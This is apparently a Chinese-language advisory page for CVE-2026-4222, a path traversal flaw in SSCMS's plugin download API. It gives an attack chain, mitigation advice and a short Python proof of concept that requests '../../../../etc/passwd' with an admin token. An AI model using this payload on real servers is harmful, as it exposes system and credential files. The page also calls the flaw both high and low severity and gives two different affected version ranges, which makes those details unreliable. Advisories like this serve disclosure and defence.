CVE-2026-4222 CVSS 3.8 低危

CVE-2026-4222: SSCMS PathUtils.RemoveParentPath路径遍历漏洞

披露日期: 2026-03-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4222

漏洞类型

路径遍历

CVSS评分

3.8 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SSCMS

漏洞概述

CVE-2026-4222是SSCMS（一个开源内容管理系统）中发现的高危路径遍历漏洞。该漏洞存在于PathUtils.RemoveParentPath函数中，受影响版本最高至7.4.0。攻击者可以通过构造恶意请求，利用/api/admin/plugins/install/actions/download接口中的path参数进行目录遍历攻击，未经授权访问服务器上的敏感文件。此漏洞需要高权限用户才能利用，但远程攻击者可在无需用户交互的情况下发起攻击。漏洞已于2026年3月16日公开披露，厂商在收到早期通知后未作出任何回应。由于该漏洞已被公开利用，建议用户尽快采取防护措施。

技术细节

该漏洞位于SSCMS的PathUtils.RemoveParentPath函数中，攻击者通过/api/admin/plugins/install/actions/download接口的path参数注入路径遍历载荷（如../），可绕过安全限制访问系统任意文件。漏洞根因在于该函数未能正确验证和清理用户输入的路径参数，导致攻击者可以使用../等目录遍历序列向上访问系统目录。CVSS 3.1评分3.8（低危），攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H）才能利用，对机密性（C:L）和完整性（I:L）影响较低。由于漏洞涉及插件安装功能，攻击者可能通过读取配置文件获取数据库凭证或其他敏感信息。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标站点使用SSCMS并确定版本<=7.4.0

STEP 2

Authentication

攻击者获取高权限管理员账户或利用已泄露的认证凭据

STEP 3

Craft Payload

构造包含路径遍历序列的path参数，如../../../../etc/passwd

STEP 4

Send Request

向/api/admin/plugins/install/actions/download发送恶意请求

STEP 5

File Access

服务器解析path参数后返回目标文件内容，实现未授权文件读取

STEP 6

Lateral Movement

利用读取的敏感配置文件进一步渗透或获取数据库访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2026-4222 Path Traversal PoC
# Target: SSCMS <= 7.4.0
# Endpoint: /api/admin/plugins/install/actions/download

target = "http://target.com"
path_param = "../../../../etc/passwd"
encoded_path = urllib.parse.quote(path_param)

url = f"{target}/api/admin/plugins/install/actions/download?path={encoded_path}"

headers = {
    "Authorization": "Bearer <admin_token>",
    "User-Agent": "Mozilla/5.0"
}

response = requests.get(url, headers=headers)
print(f"Status: {response.status_code}")
print(f"Content: {response.text}")

影响范围

SSCMS < 7.4.0

防御指南

临时缓解措施

在修复补丁发布前，可采取以下临时措施：1）禁用或限制/api/admin/plugins/install端点的访问；2）实施严格的访问控制策略；3）监控并记录所有对插件安装API的请求；4）使用WAF规则拦截包含../序列的请求；5）考虑暂时关闭插件安装功能直到官方发布修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4222
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4222
3 Details https://www.cvedetails.com/cve/CVE-2026-4222/
4 VulDB https://vuldb.com/cve/CVE-2026-4222
5 Link https://vuldb.com/?ctiid.351146
6 Link https://vuldb.com/?id.351146
7 Link https://vuldb.com/?submit.770536
8 Link https://www.yuque.com/la12138/pa2fpb/mbcvbk402bx1qbft?singleDoc

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表